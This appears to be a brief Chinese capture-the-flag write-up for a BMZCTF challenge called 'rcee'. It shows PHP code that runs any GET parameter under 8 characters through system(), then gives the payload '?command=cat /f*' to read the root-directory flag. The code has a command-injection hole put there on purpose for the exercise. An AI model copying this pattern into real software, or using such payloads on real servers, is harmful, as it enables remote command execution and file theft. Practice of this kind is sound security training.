bmzctf 刷题 rcee
<?php
$sandbox = md5("box".$_SERVER['REMOTE_ADDR'].$_SERVER['HTTP_USER_AGENT']);
echo "you are in sandbox: ".$sandbox."<br/>";
@mkdir($sandbox);
chdir($sandbox);
$command = $_GET['command'];
if(strlen($command) < 8){
system($command);
}
show_source(__FILE__);
思路:读取根目录的flag,绕过8个字节的限制
payload:
?command=cat /f*